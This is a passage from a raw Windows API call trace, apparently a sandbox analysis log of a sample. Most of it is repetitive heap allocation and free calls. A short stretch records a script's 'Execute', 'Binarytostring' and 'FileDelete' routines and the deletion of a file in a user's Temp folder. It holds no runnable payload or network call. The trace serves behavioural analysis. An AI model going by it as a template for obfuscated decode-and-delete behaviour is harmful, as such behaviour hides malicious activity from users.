hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65170 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06f0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65308 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65398 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0830 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65308 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a651d0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06d0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65110 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65308 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06e0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65140 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65188 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0880 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65398 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65308 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0720 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65278 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a650e0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07c0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65278 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a651e8 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0840 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a651d0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65320 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e08a0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65200 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65290 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07b0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65200 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a655f0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0880 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65290 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a655f0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e08a0 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65620 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65638 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0840 | out: hHeap=0x2af0000) returned 1 [0081.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65440 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a653b0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0880 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65548 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65650 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0730 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65638 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65668 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0720 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65530 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a654a0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06f0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65410 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65428 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0720 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65410 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65410 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07b0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a653e0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65608 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0730 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a653e0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65698 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0740 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a654d0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65500 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07a0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a653e0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65848 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07b0 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65500 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a656c8 | out: hHeap=0x2af0000) returned 1 [0081.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07a0 | out: hHeap=0x2af0000) returned 1 [0081.686] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.687] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.687] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0081.687] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0081.687] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0081.687] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0081.687] CharUpperBuffW (in: lpsz="FileDelete", cchLength=0xa | out: lpsz="FILEDELETE") returned 0xa [0081.687] CharUpperBuffW (in: lpsz="A4300005D31sz_", cchLength=0xe | out: lpsz="A4300005D31SZ_") returned 0xe [0081.687] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv", nBufferLength=0x104, lpBuffer=0x8ce8e8, lpFilePart=0x8ce8c4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv", lpFilePart=0x8ce8c4*="gqrfdkv") returned 0x2a [0081.687] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv")) returned 0x20 [0081.781] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv", lpFindFileData=0x8ceaf8 | out: lpFindFileData=0x8ceaf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9932fd8, ftCreationTime.dwHighDateTime=0x1d5a70d, ftLastAccessTime.dwLowDateTime=0x2e39d3c4, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0xe594b28, ftLastWriteTime.dwHighDateTime=0x1d5a722, nFileSizeHigh=0x0, nFileSizeLow=0x20c4, dwReserved0=0x9826d8, dwReserved1=0x0, cFileName="gqrfdkv", cAlternateFileName="")) returned 0x98fb48 [0081.781] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv")) returned 1 [0081.782] FindNextFileW (in: hFindFile=0x98fb48, lpFindFileData=0x8ceaf8 | out: lpFindFileData=0x8ceaf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9932fd8, ftCreationTime.dwHighDateTime=0x1d5a70d, ftLastAccessTime.dwLowDateTime=0x2e39d3c4, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0xe594b28, ftLastWriteTime.dwHighDateTime=0x1d5a722, nFileSizeHigh=0x0, nFileSizeLow=0x20c4, dwReserved0=0x9826d8, dwReserved1=0x0, cFileName="gqrfdkv", cAlternateFileName="")) returned 0 [0081.782] FindClose (in: hFindFile=0x98fb48 | out: hFindFile=0x98fb48) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbd8 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc98 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0430 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc80 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbf0 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd88 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc08 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7620 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb48 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebdb8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb90 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5e10 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb60 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb00 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03c0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd40 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd58 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebae8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc68 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebda0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebba8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbc0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb78 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5d20 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68410 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03a0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcf8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebad0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02b0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3990 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd10 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7478 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3978 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcc8 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebce0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5c08 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7338 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03f0 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39a8 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f38e8 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3930 | out: hHeap=0x2af0000) returned 1 [0081.784] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64018 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02f0 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53510 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64120 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53a88 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04a0 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a538f8 | out: hHeap=0x2af0000) returned 1 [0081.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0081.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0081.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e02f0 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0430 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f38e8 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3930 [0081.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04a0 [0081.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3978 [0081.787] CharUpperBuffW (in: lpsz="Os", cchLength=0x2 | out: lpsz="OS") returned 0x2 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3978 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04a0 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3930 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f38e8 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0430 | out: hHeap=0x2af0000) returned 1 [0081.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02f0 | out: hHeap=0x2af0000) returned 1 [0081.787] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0081.787] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f38e8 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04a0 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f38e8 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5c08 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f38e8 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3930 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03f0 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5e88 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3978 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03a0 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3978 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5e60 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3978 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3990 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03c0 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f38e8 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5eb0 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02b0 [0081.788] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5eb0 | out: hHeap=0x2af0000) returned 1 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02b0 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39a8 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x29e0370 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f38e8 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc68 [0081.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ebdb8 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5fa0 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0410 [0081.789] HeapFree (in: hHeap=0x2af0000, 